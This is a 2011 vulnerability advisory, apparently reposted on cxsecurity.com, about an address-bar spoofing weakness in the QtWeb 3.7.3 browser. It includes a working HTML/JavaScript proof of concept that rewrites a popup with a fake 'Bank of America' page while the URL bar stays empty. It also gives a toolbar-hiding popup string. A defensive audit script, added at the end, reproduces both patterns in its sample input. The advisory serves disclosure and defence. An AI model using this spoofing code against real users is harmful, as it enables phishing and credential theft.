QtWeb 3.7.3 URL Spoof

2011-10-05 / 2011-10-06
Credit: Lostmon
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################
QTWeb Internet Browser URL weakness lets remote
attackers perform spoofing or phishing attacks
Vendor URL: http://www.qtweb.net/
Vendor bugtrack: http://code.google.com/p/qtweb/issues/detail?id=151
Advisory: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
Vendor notify: YES    Exploit available: YES
##################################################

###################
Description By vendor
###################

QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).

######################
Vulnerability Description
######################

Normally, when the user navigates to a site, the browser shows the real URL. QtWeb has a weakness that lets an attacker present a window with an empty URL. This can be used for phishing or spoofing attacks, because the user may believe they are on Bank of America, for example, while the browser shows nothing in the address bar :)

Without any URL =>
http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg

An attacker can also compose a popup with the following attributes, which can likewise be used for spoofing or phishing attacks:

toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0

Popup without toolbars and address bar =>
http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg

################
Versions affected
################

QTweb 3.7.2 Vulnerable
QTweb 3.7.3 (build 087) Vulnerable
and possibly prior versions.

######################
Proof Of Concept
######################

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</title>
<script type="text/javascript">
var wx;
function invokePoC() {
  // Open a new window on the ":#:" URL, then keep rewriting its document.
  wx = open(":#:","newwin");
  setInterval("doit()",1);
}
function doit() {
  // Replace the new window's content; its address bar stays empty.
  wx.document.open();
  wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,R0lGODdh8QLUAfcAAAAAAAAAQAAAgAAA/wAgAAAgQAAggAAg/wBAAABAQABAgABA/wBgAABgQABggABg/wCAAACAQACAgACA/wCgAACgxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxNG7MQOvIAAADs='/>");
}
</script>
</head>
<body>
<h1>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</h1>
<noscript><p>This testcase requires JavaScript to run.</p></noscript>
<p>First click this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p>
<p>and look at the resulting window: the address bar does not show the URL, and if you type any URL into the address bar, the browser does not navigate to it. This issue can be used for site spoofing or phishing attacks. Safari 5.1 (7534.50)</p>
</body>
</html>

################
Solution
###############

No solution at this time !!!

###############
Timeline
###############

Discovered: Mar 30, 2011
Vendor Notify: Sep 28, 2011
Vendor response: XXXXX
Vendor Patch: XXXXXX
Public Disclosure: Oct 03, 2011

########################## End ########################

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
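
For reviewers who want to spot the two patterns described in this advisory in page script, here is an added example (not part of Lostmon's advisory or the QtWeb project): a small static audit that flags popups opened with address-bar-hiding feature strings and popups opened on an odd URL whose document is then rewritten. The function names, the heuristics and the sample script are assumptions made for illustration.

```javascript
// Added example: static audit of page script for the two patterns in this advisory.
// Heuristics and names are assumptions, not a vendor fix or the advisory's own code.
const CHROME_FEATURES = ["location", "toolbar", "menubar", "statusbar", "status"];

// Parse a window.open() feature string such as "toolbar=0,location=0".
function parseFeatures(spec) {
  const out = {};
  for (const part of spec.split(",")) {
    const [k, v = "yes"] = part.toLowerCase().split("=").map(s => s.trim());
    if (k) out[k] = !["0", "no", "false"].includes(v);
  }
  return out;
}

// Heuristic: empty, absolute http(s), or an ordinary relative path counts as navigable.
function looksNavigable(url) {
  return url === "" || /^(https?:\/\/|\/|\.{1,2}\/|[\w-])/i.test(url);
}

// Return one finding per suspicious open() call found in the script source.
function auditPopups(source) {
  const findings = [];
  // Matches open(...) and window.open(...), but not document.open(...).
  const callRe = /(?:(\w+)\s*=\s*)?(?:\bwindow\.|(?<![.\w]))open\s*\(([^)]*)\)/g;
  for (const m of source.matchAll(callRe)) {
    const handle = m[1];
    const args = [...m[2].matchAll(/(["'])(.*?)\1/g)].map(a => a[2]);
    const [url = "", , features = ""] = args;
    const parsed = parseFeatures(features);
    const hidden = CHROME_FEATURES.filter(f => parsed[f] === false);
    if (hidden.length) findings.push({ rule: "hidden-chrome", url, hidden });
    // Is the returned window handle later used to rewrite the popup's document?
    const rewrites = Boolean(handle) &&
      new RegExp(`\\b${handle}\\.document\\.(open|write)\\s*\\(`).test(source);
    if (!looksNavigable(url) && rewrites) {
      findings.push({ rule: "unnavigable-url-rewrite", url, handle });
    }
  }
  return findings;
}

// Constructed sample input (not taken from a real site).
const SAMPLE = `
var wx = open(":#:", "newwin");
setInterval(function () { wx.document.open(); wx.document.write("<title>Example</title>"); }, 1);
window.open("https://site.example/login", "p", "toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0");
var ok = window.open("/help.html", "help");
`;
console.log(auditPopups(SAMPLE));
```

The regular expressions are a review aid only: they do not follow aliased handles or URLs built at runtime, so a clean result does not prove a page is safe.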


Copyright 2024, cxsecurity.com